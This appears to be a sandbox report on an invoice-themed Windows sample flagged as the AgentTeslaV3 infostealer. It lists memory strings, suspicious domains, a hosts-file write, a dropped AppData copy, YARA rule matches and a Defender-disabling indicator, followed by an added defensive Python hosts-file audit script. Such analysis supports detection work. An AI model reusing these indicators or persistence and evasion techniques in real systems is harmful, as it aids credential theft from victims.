Source: Overdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.de
Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: Overdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.depA
Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: yqWDN.exe, 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 00000013.00000002.523253401.000000000339C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://I323GyXsTwT8KsWsK7L.net
Source: Overdue invoice.exe, 00000007.00000003.315746874.00000000011D4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://I323GyXsTwT8KsWsK7L.net1-5-21-3853321935-21255632
Source: Overdue invoice.exe, 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://I323GyXsTwT8KsWsK7L.net8
Source: Overdue invoice.exe, 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown | DNS traffic detected: queries for: mail.jkudyog.com
Source: Overdue invoice.exe, 00000000.00000002.298261739.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\Overdue invoice.exe | File written: C:\Windows\System32\drivers\etc\hosts
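The report records that the sample wrote the hosts file, but not what it wrote. On a stock Windows workstation that file contains only comments, so any active mapping is worth a look, and mappings that sinkhole security-vendor or update domains are the classic reason an infostealer touches it. The following hosts-file audit is an added example, not from the report: the hosts content is constructed, and WATCHED_SUFFIXES is an assumed watch-list, not a claim about which domains this sample targeted.

```python
r"""Audit a Windows hosts file: flag every active mapping, ranking sinkholed
security/update domains highest and redirections to other addresses next.

Added example; the sample hosts text and WATCHED_SUFFIXES are assumptions.
"""
import ipaddress
from typing import List, Tuple

# Assumed watch-list of domains an infostealer would want to block.
WATCHED_SUFFIXES = (
    "microsoft.com", "windowsupdate.com", "virustotal.com",
    "avast.com", "kaspersky.com", "symantec.com", "eset.com", "malwarebytes.com",
)

Finding = Tuple[str, int, str, str]  # (severity, line number, raw line, reason)


def _watched(host: str) -> bool:
    h = host.lower().rstrip(".")
    return any(h == s or h.endswith("." + s) for s in WATCHED_SUFFIXES)


def audit_hosts(text: str) -> List[Finding]:
    findings: List[Finding] = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop trailing comments
        if not line:
            continue  # blank or comment-only, which is all a default hosts file has
        parts = line.split()
        ip, hosts = parts[0], parts[1:]
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            findings.append(("low", n, raw, "unparseable entry"))
            continue
        sinkhole = addr.is_loopback or addr.is_unspecified  # 127.x, ::1, 0.0.0.0
        if sinkhole and hosts == ["localhost"]:
            continue  # an explicit localhost line is harmless
        for h in hosts:
            if sinkhole and _watched(h):
                findings.append(("high", n, raw, f"{h} is sinkholed; blocks AV/update traffic"))
            elif not sinkhole:
                findings.append(("medium", n, raw, f"{h} is redirected to {ip}"))
            else:
                findings.append(("low", n, raw, f"{h} is sinkholed (unexpected on a workstation)"))
    return findings


def audit_file(path: str = r"C:\Windows\System32\drivers\etc\hosts") -> List[Finding]:
    """Audit the live hosts file (default path is the one the report names)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return audit_hosts(fh.read())


# Constructed hosts file: the stock Microsoft comment header plus four tampered lines.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
# 127.0.0.1       localhost
# ::1             localhost
127.0.0.1 www.virustotal.com
0.0.0.0 update.avast.com urs.microsoft.com
192.0.2.10 mail.contoso.com
127.0.0.1 dev.local
"""

if __name__ == "__main__":
    for sev, n, raw, why in audit_hosts(SAMPLE_HOSTS):
        print(f"{sev:6} line {n}: {raw!r} -> {why}")
```

When you run this against a real host after an incident, also compare the file's modification time with the process-creation timeline: a hosts file rewritten by an executable from the user's Desktop, as in the behaviour line above, is a stronger signal than any single mapping.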

System Summary

Source: 16.2.yqWDN.exe.3de2e78.2.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 19.0.yqWDN.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 19.0.yqWDN.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 16.2.yqWDN.exe.3de2e78.2.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 7.0.Overdue invoice.exe.400000.10.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 7.0.Overdue invoice.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 15.2.yqWDN.exe.3e72e78.2.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 7.0.Overdue invoice.exe.400000.12.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 19.2.yqWDN.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 19.0.yqWDN.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 7.2.Overdue invoice.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 19.0.yqWDN.exe.400000.10.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 7.0.Overdue invoice.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 19.0.yqWDN.exe.400000.12.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 15.2.yqWDN.exe.2d1039c.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing artifacts associated with disabling Windows Defender Author: ditekSHen
Source: 0.2.Overdue invoice.exe.3ac2e78.4.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 7.0.Overdue invoice.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 15.2.yqWDN.exe.3e72e78.2.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 15.2.yqWDN.exe.3d8e3f8.3.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 16.2.yqWDN.exe.3cfe3f8.3.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Overdue invoice.exe.3ac2e78.4.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Overdue invoice.exe.39de3f8.3.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.Overdue invoice.exe.2960384.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                    Source: initial sampleStatic PE information: Filename: Overdue invoice.exe
                    Source: 7.0.Overdue invoice.exe.400000.10.unpack, u003cPrivateImplementationDetailsu003eu007b343CACBFu002d3C8Au002d4F57u002dA6FEu002d44CB0DE3909Au007d/BD96E5B6u002d862Eu002d4184u002d9A95u002d4B268ED60D89.csLarge array initialization: .cctor: array initializer size 11614
                    Source: 7.0.Overdue invoice.exe.400000.6.unpack, u003cPrivateImplementationDetailsu003eu007b343CACBFu002d3C8Au002d4F57u002dA6FEu002d44CB0DE3909Au007d/BD96E5B6u002d862Eu002d4184u002d9A95u002d4B268ED60D89.csLarge array initialization: .cctor: array initializer size 11614
                    Source: 7.0.Overdue invoice.exe.400000.12.unpack, u003cPrivateImplementationDetailsu003eu007b343CACBFu002d3C8Au002d4F57u002dA6FEu002d44CB0DE3909Au007d/BD96E5B6u002d862Eu002d4184u002d9A95u002d4B268ED60D89.csLarge array initialization: .cctor: array initializer size 11614
                    Source: 7.2.Overdue invoice.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b343CACBFu002d3C8Au002d4F57u002dA6FEu002d44CB0DE3909Au007d/BD96E5B6u002d862Eu002d4184u002d9A95u002d4B268ED60D89.csLarge array initialization: .cctor: array initializer size 11614
                    Source: Overdue invoice.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                    Source: 16.2.yqWDN.exe.3de2e78.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 19.0.yqWDN.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 19.0.yqWDN.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 16.2.yqWDN.exe.3de2e78.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 7.0.Overdue invoice.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 7.0.Overdue invoice.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 15.2.yqWDN.exe.3e72e78.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 7.0.Overdue invoice.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 19.2.yqWDN.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 19.0.yqWDN.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 7.2.Overdue invoice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 19.0.yqWDN.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 7.0.Overdue invoice.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 19.0.yqWDN.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 15.2.yqWDN.exe.2d1039c.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                    Source: 0.2.Overdue invoice.exe.3ac2e78.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 7.0.Overdue invoice.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 15.2.yqWDN.exe.3e72e78.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 15.2.yqWDN.exe.3d8e3f8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 16.2.yqWDN.exe.3cfe3f8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Overdue invoice.exe.3ac2e78.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Overdue invoice.exe.39de3f8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Overdue invoice.exe.2960384.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_00524DB1
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_00522809
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_005259ED
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_00C2E2D0
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_00C2E2E0
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_00C2BA74
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_027319C0
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_02731058
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_02731048
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_02731740
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_02731730
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_027319B0
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_02731C83
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_02731C88
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_0726D688
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_07265530
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_07266420
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_07264B68
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_0726C268
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_07268AB0
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_072632F0
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_072642C8
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_07263751
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_07263758
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_07264FB9
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_07264FC8
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_07269625
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_07269648
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_07268648
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_07268658
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_07265520
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_0726CD88
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_07268468
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_07268458
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_07266329
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_07266369
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_07264B58
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_072683C8
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_0726424D
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_07268AA1
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_072672C8
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_072672D8
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_0726E078
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_072688E8
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_072688D8
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 5_2_002F59ED
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 5_2_002F2809
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 5_2_002F4DB1
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_00FE4DB1
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_00FE59ED
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_00FE2809
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_016DF0A0
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_016DF3E8
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_016D6140
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_064EBB18
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_064EC878
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_064EF830
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_064E1FF8
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_064E0040
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_064E0006
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_06C6ACA8
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_06C66BF0
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_06C68608
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_06C644F8
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_06C61D28
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_06C63330
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_06C641D1
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_008D59ED
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_008D2809
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_008D4DB1
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_02C6E2DB
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_02C6E2E0
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_02C6BA74
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_04CF1938
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_04CF1C00
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_04CF15F0
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_04CF16A9
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_04CF16B8
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_04CF0FC3
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_04CF0FD0
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_04CF192B
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_04CF1BF3
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_07364B68
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_0736C268
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_07368AB0
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_0736D688
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_073632F0
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_073642C8
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_07365530
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_07366420
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_07366329
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_07364F61
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_07366369
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_07363753
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_07363758
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_07364B58
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_07364FB9
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_07364FC8
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_07369625
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_07368658
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_0736424D
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_07369648
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_07368648
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_07368AA1
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_073672D8
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_073672C9
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_07365520
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_0736CD88
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_0736E078
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_07368468
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_07368458
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_073688E8
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 15_2_073688D8
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_00832809
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_008359ED
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_00834DB1
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_012CE2E0
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_012CE2D0
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_012CBA74
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_07194B68
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_0719C268
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_0719D688
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_07198AB0
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_071942C8
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_071932F0
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_07195530
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_07196420
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_07196329
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_07193758
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_07194B58
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_07193753
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_07196369
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_07194F61
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_07194FB9
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_07194FC8
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_07199625
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_07198658
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_07199648
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_07198648
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_0719424D
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_07198AA1
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_071972D8
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_071972C9
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_07195520
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_0719CD88
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_07198458
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_0719E078
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_07198468
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_071988D8
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Code function: 16_2_071988E8
Source: Overdue invoice.exe, 00000000.00000000.250199094.00000000005C6000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamecCjl.exeF vs Overdue invoice.exe
Source: Overdue invoice.exe, 00000000.00000002.298261739.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Overdue invoice.exe
Source: Overdue invoice.exe, 00000000.00000002.298765029.000000000294E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameBunifu.UI.dll4 vs Overdue invoice.exe
Source: Overdue invoice.exe, 00000000.00000002.298765029.000000000294E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameBMTJANdgKFUuCnPQQfLHbkDsZIdwvTWhXel.exe4 vs Overdue invoice.exe
Source: Overdue invoice.exe, 00000000.00000002.300706050.000000000393F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMajorRevision.exe< vs Overdue invoice.exe
Source: Overdue invoice.exe, 00000000.00000002.300706050.000000000393F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameBMTJANdgKFUuCnPQQfLHbkDsZIdwvTWhXel.exe4 vs Overdue invoice.exe
Source: Overdue invoice.exe, 00000000.00000002.299437457.0000000002C16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMajorRevision.exe< vs Overdue invoice.exe
Source: Overdue invoice.exe, 00000000.00000002.304201924.0000000007160000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMajorRevision.exe< vs Overdue invoice.exe
Source: Overdue invoice.exe, 00000000.00000002.302129408.0000000003B92000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamecCjl.exeF vs Overdue invoice.exe
Source: Overdue invoice.exe, 00000005.00000002.290997467.0000000000396000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamecCjl.exeF vs Overdue invoice.exe
Source: Overdue invoice.exe, 00000007.00000000.295675285.0000000001086000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamecCjl.exeF vs Overdue invoice.exe
